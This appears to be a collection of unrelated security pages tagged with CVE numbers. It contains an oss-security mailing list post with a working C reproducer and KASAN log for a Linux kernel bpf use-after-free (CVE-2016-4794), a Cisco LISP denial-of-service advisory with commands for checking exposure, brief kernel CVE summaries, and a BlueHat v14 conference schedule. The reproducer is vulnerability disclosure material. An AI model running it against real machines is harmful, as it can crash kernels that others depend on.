Use-after-free vulnerability in mm/percpu.c in the Linux kernel through 4.6 allows local users to cause a denial of service (BUG) or possibly have unspecified other impact via crafted use of the mmap and bpf system calls.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[thread-next>\] \[day\] \[month\] \[year\] \[list\]

Date: Thu, 12 May 2016 15:59:11 +0800
From: Marco Grassi <marco.gra@...il.com>
To: oss-security@...ts.openwall.com
Subject: Linux Kernel bpf related UAF

Hi,

the following reproducer will cause a UAF of a previously allocated memory
in bpf.

You can reproduce with linux kernel master, or 4.6-rc6 4.6-rc7 and maybe
other kernel versions.

In the reproducer there is also a log of the UAF with KASAN of the kernel
running on qemu x64

Thanks

Marco

Reproducer C file:
==================

// Linux kernel version: 4.6-rc7 or 4.6-rc6, or linux master (tested
2016/05/12) compiled with KASAN to see the log
// Compile it with gcc -o durr durr.c
// Run it and it will cause the UAF endlessly see qemu logs dmesg/logs
// here there is a example log

/\*
\[  228.998319\]
==================================================================
\[  228.999029\] BUG: KASAN: use-after-free in
pcpu\_extend\_area\_map+0x111/0x130 at addr ffff88006785d47c
\[  228.999833\] Read of size 4 by task durr/5570
\[  229.000219\]
=============================================================================
\[  229.000943\] BUG kmalloc-192 (Tainted: G    B          ): kasan: bad
access detected
\[  229.001619\]
-----------------------------------------------------------------------------
\[  229.001619\]
\[  229.002485\] INFO: Allocated in 0xbbbbbbbbbbbbbbbb
age=18446720155036662370 cpu=0 pid=0
\[  229.003198\]  pcpu\_mem\_zalloc+0x56/0xa0
\[  229.003542\]  \_\_\_slab\_alloc.constprop.60+0x3f9/0x440
\[  229.003995\]  \_\_slab\_alloc.constprop.59+0x20/0x40
\[  229.004426\]  \_\_kmalloc+0x20b/0x240
\[  229.004749\]  pcpu\_mem\_zalloc+0x56/0xa0
\[  229.005102\]  pcpu\_create\_chunk+0x23/0x490
\[  229.005478\]  pcpu\_alloc+0xa42/0xbc0
\[  229.005806\]  \_\_alloc\_percpu\_gfp+0x2c/0x40
\[  229.006179\]  array\_map\_alloc+0x52b/0x6e0
\[  229.006548\]  SyS\_bpf+0x6ee/0x1800
\[  229.006868\]  entry\_SYSCALL\_64\_fastpath+0x1a/0xa4
\[  229.007302\] INFO: Freed in 0xffffba5f age=18446738129474796130 cpu=0
pid=0
\[  229.007934\]  kvfree+0x3b/0x60
\[  229.008220\]  \_\_slab\_free+0x1df/0x2e0
\[  229.008561\]  kfree+0x176/0x190
\[  229.008847\]  kvfree+0x3b/0x60
\[  229.009127\]  pcpu\_balance\_workfn+0x755/0xe10
\[  229.009527\]  process\_one\_work+0x882/0x12d0
\[  229.009905\]  worker\_thread+0xe4/0x1300
\[  229.010251\]  kthread+0x1fb/0x280
\[  229.010553\]  ret\_from\_fork+0x22/0x40
\[  229.010891\] INFO: Slab 0xffffea00019e1700 objects=15 used=9
fp=0xffff88006785d048 flags=0x4000000000004080
\[  229.011771\] INFO: Object 0xffff88006785d450 @offset=5200
fp=0xbbbbbbbbbbbbbbbb
\[  229.011771\]
\[  229.012562\] Redzone ffff88006785d448: 00 00 00 00 00 00 00 00
               ........
\[  229.013356\] Object ffff88006785d450: bb bb bb bb bb bb bb bb 00 00 00 00
00 00 00 00  ................
\[  229.014194\] Object ffff88006785d460: 58 d4 3c 6b 00 88 ff ff 00 00 20 00
00 00 20 00  X.<k...... ... .
\[  229.015033\] Object ffff88006785d470: 00 00 e0 fa ff e8 ff ff 01 00 00 00
00 01 00 00  ................
\[  229.015869\] Object ffff88006785d480: 08 80 87 65 00 88 ff ff e0 ff ff ff
0f 00 00 00  ...e............
\[  229.016702\] Object ffff88006785d490: 90 d4 85 67 00 88 ff ff 90 d4 85 67
00 88 ff ff  ...g.......g....
\[  229.017534\] Object ffff88006785d4a0: e0 8a 49 81 ff ff ff ff a8 52 92 67
00 88 ff ff  ..I......R.g....
\[  229.018368\] Object ffff88006785d4b0: 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00  ................
\[  229.019215\] Object ffff88006785d4c0: 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00  ................
\[  229.020056\] Object ffff88006785d4d0: 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00  ................
\[  229.020901\] Object ffff88006785d4e0: 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00  ................
\[  229.021745\] Object ffff88006785d4f0: 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00  ................
\[  229.022587\] Object ffff88006785d500: 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00  ................
\[  229.023431\] Redzone ffff88006785d510: 00 00 00 00 00 00 00 00
               ........
\[  229.024219\] Padding ffff88006785d648: 61 ba ff ff 00 00 00 00
               a.......
\[  229.025029\] CPU: 0 PID: 5570 Comm: durr Tainted: G    B
4.6.0-rc6 #6
\[  229.025681\] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS
Ubuntu-1.8.2-1ubuntu1 04/01/2014
\[  229.026532\]  0000000000000000 00000000d3335927 ffff880065e1fb08
ffffffff81b25fb3
\[  229.027250\]  ffff88006785c000 ffff88006785d450 ffff88006cc02a40
ffffea00019e1700
\[  229.027968\]  ffff880065e1fb38 ffffffff815282c5 ffff88006cc02a40
ffffea00019e1700
\[  229.028682\] Call Trace:
\[  229.028917\]  \[<ffffffff81b25fb3>\] dump\_stack+0x83/0xb0
\[  229.029389\]  \[<ffffffff815282c5>\] print\_trailer+0x115/0x1a0
\[  229.029899\]  \[<ffffffff8152d144>\] object\_err+0x34/0x40
\[  229.030370\]  \[<ffffffff8152f2e6>\] kasan\_report\_error+0x226/0x550
\[  229.030926\]  \[<ffffffff8152e955>\] ? kasan\_unpoison\_shadow+0x35/0x50
\[  229.031498\]  \[<ffffffff8152e9ce>\] ? kasan\_kmalloc+0x5e/0x70
\[  229.032008\]  \[<ffffffff8152f751>\] \_\_asan\_report\_load4\_noabort+0x61/0x70
\[  229.032612\]  \[<ffffffff81496bf1>\] ? pcpu\_extend\_area\_map+0x111/0x130
\[  229.033192\]  \[<ffffffff81496bf1>\] pcpu\_extend\_area\_map+0x111/0x130
\[  229.033755\]  \[<ffffffff81496f77>\] ? pcpu\_create\_chunk+0x367/0x490
\[  229.034314\]  \[<ffffffff8149734c>\] pcpu\_alloc+0x2ac/0xbc0
\[  229.034804\]  \[<ffffffff814970a0>\] ? pcpu\_create\_chunk+0x490/0x490
\[  229.035358\]  \[<ffffffff8152e955>\] ? kasan\_unpoison\_shadow+0x35/0x50
\[  229.035929\]  \[<ffffffff81499879>\] ? kmalloc\_order+0x59/0x70
\[  229.036438\]  \[<ffffffff814998b4>\] ? kmalloc\_order\_trace+0x24/0xa0
\[  229.036994\]  \[<ffffffff8152ad9c>\] ? \_\_kmalloc+0x1ec/0x240
\[  229.037486\]  \[<ffffffff81497c8c>\] \_\_alloc\_percpu\_gfp+0x2c/0x40
\[  229.038018\]  \[<ffffffff813e832b>\] array\_map\_alloc+0x52b/0x6e0
\[  229.038543\]  \[<ffffffff813d65ce>\] SyS\_bpf+0x6ee/0x1800
\[  229.039017\]  \[<ffffffff810dc37d>\] ? \_\_do\_page\_fault+0x1cd/0xb50
\[  229.039558\]  \[<ffffffff813d5ee0>\] ? bpf\_prog\_new\_fd+0x30/0x30
\[  229.040083\]  \[<ffffffff810dcda9>\] ? trace\_do\_page\_fault+0x79/0x240
\[  229.040649\]  \[<ffffffff82ba1932>\] entry\_SYSCALL\_64\_fastpath+0x1a/0xa4
\[  229.041236\] Memory state around the buggy address:
\[  229.041678\]  ffff88006785d300: fc fc fc fc fc fc fc fc fc fc fc fc fc fc
fc fc
\[  229.042331\]  ffff88006785d380: fc fc fc fc fc fc fc fc fc fc fc fc fc fc
fc fc
\[  229.042992\] >ffff88006785d400: fc fc fc fc fc fc fc fc fc fc fc fb fb fb
fb fb
\[  229.043642\]
    ^
\[  229.044286\]  ffff88006785d480: fb fb fb fb fb fb fb fb fb fb fb fb fb fb
fb fb
\[  229.044938\]  ffff88006785d500: fb fb fb fc fc fc fc fc fc fc fc fc fc fc
fc fc
\[  229.045589\]
==================================================================

\*/

#include <stdio.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <string.h>
#include <stdint.h>
#include <pthread.h>

#ifndef SYS\_mmap
#define SYS\_mmap 9
#endif
#ifndef SYS\_bpf
#define SYS\_bpf 321
#endif

long r\[6\];

int main(int argc, char \*\*argv)
{
    printf("--beginning of program\\n");

    while(1) {

        pid\_t pid = fork();

        if (pid == 0)
        {
            // child process
            memset(r, -1, sizeof(r));
            r\[0\] = syscall(SYS\_mmap, 0x20000000ul, 0xf000ul, 0x3ul, 0x32ul,
0xfffffffffffffffful, 0x0ul);
            \*(uint32\_t\*)0x20006eea = (uint32\_t)0x6;
            \*(uint32\_t\*)0x20006eee = (uint32\_t)0x4;
            \*(uint32\_t\*)0x20006ef2 = (uint32\_t)0x54d1;
            \*(uint32\_t\*)0x20006ef6 = (uint32\_t)0xc93;
            r\[5\] = syscall(SYS\_bpf, 0x0ul, 0x20006eeaul, 0x10ul, 0, 0, 0);
            return 0;
        }
        else if (pid > 0)
        {
            // parent process
            memset(r, -1, sizeof(r));
            r\[0\] = syscall(SYS\_mmap, 0x20000000ul, 0xf000ul, 0x3ul, 0x32ul,
0xfffffffffffffffful, 0x0ul);
            \*(uint32\_t\*)0x20006eea = (uint32\_t)0x6;
            \*(uint32\_t\*)0x20006eee = (uint32\_t)0x4;
            \*(uint32\_t\*)0x20006ef2 = (uint32\_t)0x54d1;
            \*(uint32\_t\*)0x20006ef6 = (uint32\_t)0xc93;
            r\[5\] = syscall(SYS\_bpf, 0x0ul, 0x20006eeaul, 0x10ul, 0, 0, 0);
            int returnStatus;
            waitpid(pid, &returnStatus, 0);
            printf("collected child\\n");

        }
        else
        {
            // fork failed
            printf("fork() failed!\\n");
            return 1;
        }
    }

    printf("--end of program--\\n");

    return 0;
}

=====================

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

CVE-2016-4794: security - Linux Kernel bpf related UAF

The Locator/ID Separation Protocol (LISP) implementation in Cisco IOS 15.1 and 15.2 and NX-OS 4.1 through 6.2 allows remote attackers to cause a denial of service (device reload) via a crafted header in a packet, aka Bug ID CSCuu64279.

Cisco Catalyst 6500 and 6800 Series Switches running Cisco IOS Software, and Cisco Nexus 7000 and Nexus 7700 Series Switches with an M1 Series Gigabit Ethernet Module running Cisco NX-OS Software are vulnerable when LISP is configured. LISP is not enabled by default on either platform.

For information about which Cisco IOS and NX-OS Software versions are vulnerable, see the "Fixed Software" section of this advisory.

**Cisco Catalyst 6500 and 6800 Series Switches** LISP support was first introduced in release 15.1(1)SY1. To determine if LISP is configured on the device, use the **show running-config | include lisp** command to see if **router lisp** is configured, as shown in the following example:

iosRouter# **show running-config | include lisp**  
**router lisp**

**Determining the Cisco IOS Software Release**

To determine which Cisco IOS Software release is running on a Cisco product, administrators can log in to the device and issue the **show version** command to display the system banner. If the device is running Cisco IOS Software, the system banner displays text similar to **Cisco Internetwork Operating System Software** or **Cisco IOS Software**. The image name displays in parentheses, followed by the Cisco IOS Software release number and release name.

The following example identifies a Cisco product that is running Cisco IOS Software Release 15.2(1)SY1 with an installed image name of c6880x-ADVENTERPRISEK9-M:

iosRouter# **show version**  
Cisco IOS Software, c6880x Software (c6880x-ADVENTERPRISEK9-M), Version 15.2(1)SY1, RELEASE SOFTWARE (fc5)  
Technical Support: http://www.cisco.com/techsupport  
Copyright (c) 1986-2015 by Cisco Systems, Inc.  
Compiled Mon 11-May-15 00:26 by prod\_rel\_team  
.  
.  
.

Additional information about Cisco IOS Software release naming conventions is available in White Paper: Cisco IOS and NX-OS Software Reference Guide.

**Nexus 7000 and 7700 Series Switches  
**  
The Nexus 7000 and 7700 Series Switches added LISP support in software release 5.2(1). The Nexus 7000 and 7700 Series Switches with LISP configured are vulnerable only if the LISP packet is input on an M1 Series Gigabit Ethernet Module. Use the **show module | include M1** command to check whether an M1 module is installed in the Nexus 7000 chassis, as shown in the following example:

nxosRouter# **show module | include M1**  
3    48     10/100/1000 Mbps Ethernet XL Module N7K-M148GT-11L     powered-up

If there is an M1 Series Gigabit Ethernet Module installed, it will be vulnerable only if LISP packets are input to interfaces configured on this module. To check whether the LISP feature is enabled, use the **show feature | include lisp** command, as in the following example:

nxosRouter# **show feature | include lisp**  
lisp                  1         enabled

The **show ip lisp** command can be used to determine the LISP configuration for the M1 interfaces:

nxosRouter# **show ip lisp**   
LISP IP Configuration Information for VRF "default" (iid 1)  
  Ingress Tunnel Router (ITR):enabled  
  Egress Tunnel Router (ETR):disabled  
  Proxy-ITR Router (PTR):disabled  
  Proxy-ETR Router (PETR):disabled  
  Map Resolver (MR):disabled  
  Map Server (MS):disabled  
  LISP Multicast:disabled  
_.  
.  
._

For more information on the Nexus 7000 and 7700 Series Switches LISP Configuration, see Configuring Locator/ID Separation Protocol.

**Determine the Cisco NX-OS Software Release**

To determine the Cisco NX-OS Software release that is running on a Cisco Nexus 7000 Series switch, administrators can log in to the device and issue the **show version** command. The following example identifies the 6.2(14) release:

nxosRouter# **show version**
Cisco Nexus Operating System (NX-OS) Software  
TAC support: http://www.cisco.com/tac  
Documents: http://www.cisco.com/en/US/products/ps9372/tsd\_products\_support\_series\_home.html  
Copyright (c) 2002-2015, Cisco Systems, Inc. All rights reserved.  
The copyrights to certain works contained in this software are  
owned by other third parties and used and distributed under  
license. Certain components of this software are licensed under  
the GNU General Public License (GPL) version 2.0 or the GNU  
Lesser General Public License (LGPL) Version 2.1. A copy of each  
such license is available at  
http://www.opensource.org/licenses/gpl-2.0.php and  
http://www.opensource.org/licenses/lgpl-2.1.php
  
Software  
  BIOS:      version 2.12.0  
  kickstart: version 6.2(14)  
  system:    version 6.2(14)

.  
.  
.

**Note**: The following Cisco M1 Series Gigabit Ethernet Module Series modules are no longer supported as of Cisco NX-OS Release 7.3(0)D1(1):

*   N7K-M148GT-11
*   N7K-M132XP-12
*   N7K-M148GS-11

  

No other Cisco products are currently known to be affected by this vulnerability.

Cisco has confirmed that this vulnerability does not affect Cisco IOS-XR and Cisco IOS-XE.

Cisco 7600 Series Routers are not affected by this vulnerability.

CVE-2016-1351: Cisco Security Advisory: Cisco IOS and NX-OS Software Locator/ID Separation Protocol Packet Denial of Service Vulnerability

The batadv_frag_merge_packets function in net/batman-adv/fragmentation.c in the B.A.T.M.A.N. implementation in the Linux kernel through 3.18.1 uses an incorrect length field during a calculation of an amount of memory, which allows remote attackers to cause a denial of service (mesh-node system crash) via fragmented packets.

CVE-2014-9428: #774155 - linux: CVE-2014-9428: Remote crash of kernel via batman-adv module

It’s that time of year and BlueHat v14 is almost upon us. As always, BlueHat is an opportunity for us to bring the brightest minds in security together, both internal and external, to discuss and tackle some of the hardest problems facing the industry today. Through this conference, our engineering teams get deep technical information and education on the latest threats from proven industry experts.

/ By bluehat / October 06, 2014 / 7 min read

It’s that time of year and BlueHat v14 is almost upon us. As always, BlueHat is an opportunity for us to bring the brightest minds in security together, both internal and external, to discuss and tackle some of the hardest problems facing the industry today. Through this conference, our engineering teams get deep technical information and education on the latest threats from proven industry experts.

BlueHat kicks off on October 9th where we will spend the day focusing on researcher methodologies such as fuzzing, red team assessments, malware analysis and BIOS attacks. On the second day, we will have three tracks starting with Security & Identity, followed by State of the Hack (focusing on next generation of advanced persistent threats and web exploit detection) and then finally, we will end with Security in Deployed Environments.

We are very excited about interaction between Microsoft engineers and other top security experts who are coming to speak at the event. Here is a list of their talks:

\*Please note that this schedule is subject to change.

**October 9th, 2014**

**START**

**END**

**SPEAKER**

**TALK TITLE**

9:00 AM

9:40 AM

Chris Betz

**Keynote**

9:40 AM

10:20 AM

Stefano Zanero

**Botintime - Phoenix: DGA-based Botnet Tracking and Intelligence** Its common knowledge that a malicious domain automatically generated will not become popular and also an attacker will register a domain with a Top Level Domain that does not require clearance. Hence, we use phoenix which filters out domains likely to be generated by humans. The core of Phoenix is its ability to separate DGA from non-DGA domains, using linguistic features.

10:20 AM

10:35 AM

Break

10:35 AM

11:15 AM

Scott Longheyer

**Government Snooping Potentially Now Constitutes an Advance Persistent Threat** Security is the application of Privacy’s intentions, so open the pocketbook and check your ciphers. Gain a deeper understanding of Microsoft’s position on privacy and how online services intend to protect customer data.

11:15 AM

11:55 AM

Stefano Zanero

**Jackdaw talk - Automatic Malware Behavior Extraction and Tagging** This talk will focus on our approach for extracting (interesting) behavior specifications in an automatic way from a large collection of (untagged) malware. If you wonder why? It’s because we believe in giving support to the analyst by providing a list of important behaviors, with a rough explanation, to prioritize the analysis.

11:55 AM

12:55 PM

Lunch

12:55 PM

1:15 PM

Xeno Kovah

**UEFI - What would it take to enable global firmware vulnerability & integrity checking?** This talk will describe what actions are being taken to improve security for PC firmware, and what different groups in Microsoft can do to help.

1:15 PM

1:35 PM

Yuriy Bulygin

**UEFI - Summary of Attacks against BIOS and Secure Boot** A variety of attacks targeting platform firmware have been discussed publicly, drawing attention to the pre-boot and firmware components of the platform such as BIOS and SMM, UEFI secure boot and Full Disk Encryption solutions. This talk will detail and organize some of the attacks and how they work. We will cover attacks against BIOS write protection, attacks leveraging hardware configuration against SMM memory protections, attacks using vulnerabilities in SMI handlers, attacks against BIOS update implementations, attacks bypassing secure boot, and various other issues. We will describe underlying vulnerabilities and how to assess systems for these issues. After watching, you should understand how these attacks work, how they are mitigated, and how to verify if your system has any of these problems.

1:35 PM

2:15 PM

Josh Thomas

**Behind the NDA: How to attack a product under deadline** This talk will focus on a brief security assessment of the Windows Phone / Nokia Lumia platforms with the intent of exploring attack methodologies. This talk will focus on how we as consultants approach a new problem / technology and how we can quickly become productive on new and previously unknown / unexplored hardware and software components.

2:15 PM

2:35 PM

Sergey Bratus, Julian Bangert

**Defining and Enforcing Intent Semantics at ABI level** Dominant OS security policy designs treat a process as an opaque entity that has a “bag” of permissions to access some OS resources at any time, in any order. Now that the sensitive data that we most want to protect may never touch the filesystem or even cross a process boundary, these designs fail at their purpose. We introduce a design that has a much higher granularity of protection, yet is compatible with existing ABI, standard build chains, and binary utilities.

2:35 PM

2:50 PM

Break

2:50 PM

3:30 PM

Andrew Ruef

**Build It Break It Competition** We created a competition where students design and implement secure programs, and identify bugs in each other’s programs. We’ll talk about the design of the competition, the data we’ve gathered from executing the competition, our plans for future competitions, and what the data is telling us about software security, programming languages, education, and software development.

3:30 PM

4:10 PM

Ram Shankar Siva Kumar, John Walton

**Subverting machine learning detections for fun and profit** If you are using Machine learning in your feature, it can be attacked! This talk is a primer on Adversarial Machine learning wherein we show how attackers can manipulate machine learning systems to get the result they want you to see. You will learn how to protect yourself and detect such attacks. You don’t need to know about Machine learning to attend this talk – we’ve got you covered.

4:10 PM

4:40 PM

Lightning Talks

**October 10th, 2014**

9:00 AM

10:00 AM

Lightning Talks & Breakfast

10:00 AM

10:40 AM

Benjamin Delpy, Chris Campbell, Skip Duckwall

**The Attacker’s View of Windows Authentication and Post Exploitation part 1** This talk will focus on the how Windows authentication works in the real world and what are the popular attacks against it. You will learn the thought process of attackers in the real world and how it differs from a defender’s perspective. We’ll also cover post-exploitation tools and techniques such as Mimikatz. Finally, we’ll discuss next steps – How do you design services that are breach-resistant and make authentication harder to crack.

10:40 AM

11:20 AM

Benjamin Delpy, Chris Campbell, Skip Duckwall

**The Attacker’s View of Windows Authentication and Post Exploitation part 2**

11:20 AM

11:35 AM

Break

11:35 AM

12:15 PM

Ho John Lee

**Privacy and Security in a Personalized Services World** An introduction and discussion of current policy issues around personalized mobile and cloud-based knowledge services. In this talk you will learn about some of the privacy and policy issues associated with large scale, cloud based personalization that are different from those in web search, email, or social networks. I will also present some concepts and patterns for building mobile and personalized services that honor individual user data obligations while also enabling offline data analysis and global, low latency serving infrastructure.

12:15 PM

12:55 PM

Bo Qu

**The failure and success in IE fuzzing** The road to success is often paved with failure. In this presentation we will discuss the mistakes and challenges we overcame while developing our fuzzer that has successfully discovered over 100 vulnerabilities in Internet Explorer. Welcome to the school of hard knocks!

12:55 PM

1:55 PM

Lunch

1:55 PM

2:35 PM

John Walton

**Next Generation Advanced Persistent Threat™** What will tomorrow’s threat landscape, look like? How can attacks become even more advanced than we are observing today? What will the adversary’s arsenal contain? The Next Generation Advanced Persistent Threat™ talk will peer into the future and these exact questions. Come discover how we will continue to be outmaneuvered during every phase of the cyber kill chain

2:35 PM

2:55 PM

David Finn

**Fighting Cybercrime with Big Data** The Microsoft Digital Crimes Unit (“DCU”) is a team of about 100 people, including former prosecutors, law enforcement officials, security analysts, investigators, attorneys, and intelligence analysts, dedicated to the fight against global cybercrime. In this presentation about DCU’s CSI-like blend of crime fighting and technology, find out how Big Data and analytics is revolutionizing everything DCU does – helping protect internet users, and disrupting and dismantling criminal organizations all over the world.

2:55 PM

3:10 PM

Break

3:10 PM

3:30 PM

Alexandra Savelieva, Daniel Eshner, Nuwan Ginige, Mohammad Usman

**Data Isolation In Multitenant Cloud Environment** In our talk, you’ll learn about a new solution that we built to address the problem of managing access to data across various fabrics and processing environments to mitigate top security threats of a cloud-based distributed application platform shared by multiple partners, including isolation of mutually distrustful tenant applications running side-by-side on a commodity server.

3:30 PM

4:30 PM

Daniel Edwards

**Engineer’s guide to DDOS** Are you ready to discuss DDoS? Can your online service be weaponized to attack? It’s already happened to others. Is yours next?

**Related Posts**

*   Hey Yara, find some vulnerabilities
*   Microsoft Vulnerability Severity Classification for Online Services Publication
*   マイクロソフトのオンラインサービスにおける、脆弱性の深刻度分類の公開

BlueHat v14 is almost here

Race condition in the mac80211 subsystem in the Linux kernel before 3.13.7 allows remote attackers to cause a denial of service (system crash) via network traffic that improperly interacts with the WLAN_STA_PS_STA state (aka power-save mode), related to sta_info.c and tx.c.

CVE-2014-2706

The tcp_rcv_state_process function in net/ipv4/tcp_input.c in the Linux kernel before 3.2.24 allows remote attackers to cause a denial of service (kernel resource consumption) via a flood of SYN+FIN TCP packets, a different vulnerability than CVE-2012-2663.

CVE-2012-6638

The aac_compat_ioctl function in drivers/scsi/aacraid/linit.c in the Linux kernel before 3.11.8 does not require the CAP_SYS_RAWIO capability, which allows local users to bypass intended access restrictions via a crafted ioctl call.

CVE-2013-6383

The journal_unmap_buffer function in fs/jbd2/transaction.c in the Linux kernel before 3.3.1 does not properly handle the _Delay and _Unwritten buffer head states, which allows local users to cause a denial of service (system crash) by leveraging the presence of an ext4 filesystem that was mounted with a journal.

CVE-2011-4086

Denial of service in Samba NETBIOS name service daemon (nmbd).

Tag

#bios